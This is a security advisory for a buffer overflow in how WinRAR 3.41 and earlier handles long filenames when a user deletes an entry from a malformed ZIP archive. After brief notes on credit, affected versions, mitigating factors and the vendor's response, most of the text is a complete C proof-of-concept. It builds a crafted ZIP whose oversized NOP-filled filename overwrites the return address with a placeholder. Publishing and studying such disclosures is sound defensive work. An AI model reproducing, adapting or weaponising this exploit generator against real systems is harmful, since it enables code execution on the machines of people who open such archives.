WinRAR is "a powerful archive manager. It can backup your data and reduce size of email attachments, decompress RAR, ZIP and other files downloaded from Internet and create new archives in RAR and ZIP file format".
A vulnerability in the way WinRAR handles long filenames allows a remote attacker who can convince a user to try to delete a certain file from a malformed ZIP package to cause the WinRAR program to execute arbitrary code. The following exploit code can be used to test your system for the mentioned vulnerability. |
Credit:
The information has been provided by Vafa Khoshaein.
Vulnerable Systems:
* WinRAR version 3.41 and prior
Mitigating factors:
WinRAR truncates the file name to 1023 bytes and the overflowed buffer is 500 bytes, so the maximum size of the exploit code is limited to ~0.5 KB. That is enough to delete something, but it seems not to be enough for a typical Trojan or virus. Also, this buffer contains the "Are you sure you want to delete" string before the file name, and the length of this string differs between WinRAR translations, so an exploit created for English WinRAR will not work in other versions such as French or Czech.
Vendor response:
We recently received the report about this WinRAR delete buffer overflow from Dark Eagle and agreed with him about delaying the disclosure until next WinRAR version, which we are going to release soon enough, in 1 - 2 months or maybe even sooner. Please do not disclose the information about this bug now, before Dark Eagle, who was first to find it.
Exploit:
/*
WinRAR 3.40 Buffer Overflow POC
Thanks to Miguel Tarasco Acuna. He has made a wonderful code for
Microsoft Windows Vulnerability in Compressed (zipped) Folders (MS04-034)
which I edited and made this code by.
Coded by Vafa Khoshaein - vkhoshain@hotmail.com
Vulnerability discovery date : December 10, 2004
Run this code to create vulnerable_zip.zip, then open the file in WinRAR 3.40.
It contains one entry; try to delete that entry - SECU
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
// 1-byte packing: the three header structs below are fwrite()'n straight to
// disk, so no padding may be inserted between their fields.
#pragma pack(1)
// Payload bytes of the single ZIP entry, written right after the local header
// and filename. strlen(DATOS) is 21 (0x15), matching the CompressedSize /
// UncompressedSize values set in main().
#define DATOS "vkhoshain@hotmail.com"
typedef struct {
// Local file header record: written first, followed by the filename bytes and
// the entry data. Fields are in on-disk order; with the 1-byte packing above and
// 4-byte DWORD / 2-byte WORD the record is 30 bytes, which is what
// sizeof(TOPHEADER) contributes to the central-directory offset in main().
DWORD Signature; // main() sets only the low byte (0x50), unlike the other two records
WORD VersionNeeded;
WORD GeneralPurposeFlag;
WORD CompressionMethod;
WORD ModFileTime;
WORD ModFileDate;
DWORD Crc32;
DWORD CompressedSize;
DWORD UncompressedSize;
WORD FilenameLength; // main() stores the 30800-byte (0x7850) name length here
WORD ExtraFieldLength;
}TOPHEADER;
typedef struct {
// Central-directory entry record: written after the entry data and followed by
// a second copy of the filename. On-disk order; 46 bytes under the 1-byte
// packing above. sizeof(MIDDLEHEADER) + filename length is the
// SizeCentralDirectory value main() stores in the end record.
DWORD Signature; // 0x02014B50 in main()
WORD MadeVersion;
WORD VersionNeeded;
WORD GeneralPurposeFlag;
WORD CompressionMethod;
WORD ModFileTime;
WORD ModFileDate;
DWORD Crc32;
DWORD CompressedSize;
DWORD UncompressedSize;
WORD FilenameLength; // same 30800-byte length as the local header
WORD ExtraFieldLength;
WORD FileCommentLength;
WORD DiskNumberStart;
WORD InternalFileAttributes;
DWORD ExternalFileAttributes;
DWORD RelativeOffsetOfLocalHeader; // 0: the local header is at the start of the file
}MIDDLEHEADER;
typedef struct {
// End-of-central-directory record: the last thing written to the file.
// On-disk order; 22 bytes under the 1-byte packing above.
DWORD Signature; // 0x06054B50 in main()
WORD NumOfThisDisk;
WORD NumDisckStartCentralDirectory;
WORD NumEntriesCentralDirOnThisDisk; // 1: a single entry
WORD TotalNumEntriesCentralDir;
DWORD SizeCentralDirectory; // sizeof(MIDDLEHEADER) + filename length
DWORD OffsetCentraDirRespectStartDiskNum; // sizeof(TOPHEADER) + strlen(DATOS) + filename length
WORD ZipCommentLength;
}BOTTOMHEADER;
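int main(int argc, char *argv[]) {
    /*
     * Writes vulnerable_zip.zip in the working directory: one ZIP entry whose
     * filename is a 30800-byte run of 0x90 with the four bytes "AAAA" at
     * offset 479 (the placeholder return address; a crash at 0x41414141 is
     * the observable result). The byte sequence written is exactly that of the
     * original PoC: local header, filename, entry data (DATOS), central
     * directory entry, filename again, end-of-central-directory record.
     *
     * Changes from the original: the memset that zeroed sizeof(pointer) bytes
     * and the fill loop are replaced by one memset of the whole buffer,
     * allocations and every write are checked, buffers are released, and the
     * exit status is 0 on success / 1 on failure (the original returned 1 in
     * both cases). argc/argv are unused.
     */
    (void)argc;
    (void)argv;

    int rc = 1;
    FILE *ZipFile = NULL;
    char *filename = NULL;
    TOPHEADER *Cabecera1 = NULL;
    MIDDLEHEADER *Cabecera2 = NULL;
    BOTTOMHEADER *Cabecera3 = NULL;
    /* Filename length. Far beyond the 500-byte buffer the advisory describes;
     * the value is kept as in the original PoC. */
    const DWORD c = 30800;

    printf("\nWinRAR 3.40 Buffer Overflow POC\n");
    printf("\nCoded by Vafa Khoshaein (vkhoshain@hotmail.com)\n");

    ZipFile = fopen("vulnerable_zip.zip", "w+b");
    if (!ZipFile) {
        printf("\nError in creating vulnerable_zip.zip\n");
        goto out;
    }

    filename = malloc(c);
    Cabecera1 = calloc(1, sizeof *Cabecera1);
    Cabecera2 = calloc(1, sizeof *Cabecera2);
    Cabecera3 = calloc(1, sizeof *Cabecera3);
    if (!filename || !Cabecera1 || !Cabecera2 || !Cabecera3) {
        printf("\nOut of memory\n");
        goto out;
    }

    /* Whole name is 0x90; the original zeroed only sizeof(char *) bytes before
     * its fill loop, so this yields the identical buffer. */
    memset(filename, 0x90, c);
    /* Return Address placeholder */
    memcpy(&filename[479], "AAAA", 4); /* Ret Addr EIP 0x41414141 */

    /* Local file header. Only the low byte of the signature is set here,
     * unlike the two records below; left exactly as in the original PoC. */
    Cabecera1->Signature = 0x00000050;            // DWORD
    Cabecera1->VersionNeeded = 0x000A;            // WORD
    Cabecera1->GeneralPurposeFlag = 0x0002;       // WORD
    Cabecera1->CompressionMethod = 0x0000;        // WORD
    Cabecera1->ModFileTime = 0x1362;              // WORD
    Cabecera1->ModFileDate = 0x3154;              // WORD
    Cabecera1->Crc32 = 0x85B36639;                // DWORD
    Cabecera1->CompressedSize = 0x00000015;       // DWORD == strlen(DATOS)
    Cabecera1->UncompressedSize = 0x00000015;     // DWORD == strlen(DATOS)
    Cabecera1->FilenameLength = (WORD)c;          // WORD 0x7850
    Cabecera1->ExtraFieldLength = 0x0000;         // WORD

    /* Central directory entry; mirrors the local header values. */
    Cabecera2->Signature = 0x02014B50;            // DWORD
    Cabecera2->MadeVersion = 0x0014;              // WORD
    Cabecera2->VersionNeeded = 0x000A;            // WORD
    Cabecera2->GeneralPurposeFlag = 0x0002;       // WORD
    Cabecera2->CompressionMethod = 0x0000;        // WORD
    Cabecera2->ModFileTime = 0x1362;              // WORD
    Cabecera2->ModFileDate = 0x3154;              // WORD
    Cabecera2->Crc32 = 0x85B36639;                // DWORD
    Cabecera2->CompressedSize = 0x00000015;       // DWORD
    Cabecera2->UncompressedSize = 0x00000015;     // DWORD
    Cabecera2->FilenameLength = (WORD)c;          // WORD 0x7850
    Cabecera2->ExtraFieldLength = 0x0000;         // WORD
    Cabecera2->FileCommentLength = 0x0000;        // WORD
    Cabecera2->DiskNumberStart = 0x0000;          // WORD
    Cabecera2->InternalFileAttributes = 0x0001;   // WORD
    Cabecera2->ExternalFileAttributes = 0x00000020;        // DWORD
    Cabecera2->RelativeOffsetOfLocalHeader = 0x00000000;   // DWORD: local header is at file start

    /* End of central directory: one entry; sizes derived from the packed
     * struct sizes and the filename length so they match what is written. */
    Cabecera3->Signature = 0x06054B50;            // DWORD
    Cabecera3->NumOfThisDisk = 0x0000;            // WORD
    Cabecera3->NumDisckStartCentralDirectory = 0x0000;     // WORD
    Cabecera3->NumEntriesCentralDirOnThisDisk = 0x0001;
    Cabecera3->TotalNumEntriesCentralDir = 0x0001;
    Cabecera3->SizeCentralDirectory = sizeof(MIDDLEHEADER) + c;
    Cabecera3->OffsetCentraDirRespectStartDiskNum = sizeof(TOPHEADER) + strlen(DATOS) + c;
    Cabecera3->ZipCommentLength = 0x0000;

    /* Write order defines the file layout; any short write invalidates it. */
    if (fwrite(Cabecera1, sizeof *Cabecera1, 1, ZipFile) != 1 ||
        fwrite(filename, c, 1, ZipFile) != 1 ||
        fwrite(DATOS, strlen(DATOS), 1, ZipFile) != 1 ||
        fwrite(Cabecera2, sizeof *Cabecera2, 1, ZipFile) != 1 ||
        fwrite(filename, c, 1, ZipFile) != 1 ||
        fwrite(Cabecera3, sizeof *Cabecera3, 1, ZipFile) != 1) {
        printf("\nError writing vulnerable_zip.zip\n");
        goto out;
    }
    /* fclose flushes; a failure here means the file on disk is incomplete. */
    if (fclose(ZipFile) != 0) {
        ZipFile = NULL;
        printf("\nError writing vulnerable_zip.zip\n");
        goto out;
    }
    ZipFile = NULL;

    printf("\nvulnerable_zip.zip has been created\n\n");
    rc = 0;

out:
    if (ZipFile) {
        fclose(ZipFile);
    }
    free(Cabecera3);
    free(Cabecera2);
    free(Cabecera1);
    free(filename);
    return rc;
}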
//----------------------------------------------------------------------